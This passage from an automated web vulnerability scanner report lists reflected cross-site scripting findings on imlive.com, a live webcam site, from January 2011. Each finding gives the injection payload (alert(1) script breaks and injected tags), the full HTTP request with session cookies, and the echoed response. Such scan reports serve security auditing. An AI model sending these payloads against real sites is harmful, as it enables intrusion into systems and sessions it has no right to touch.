GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 19417 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.559. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:00 GMT Connection: close Content-Length: 19578 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
4.560. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:32 GMT Connection: close Content-Length: 33756 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
4.561. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/videosfr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:13 GMT Connection: close Content-Length: 15757 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:33 GMT Connection: close Content-Length: 2375 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:11 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
4.565. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/warningms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 14469 Vary: Accept-Encoding
4.566. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 75081 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad ...[SNIP]...
4.567. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
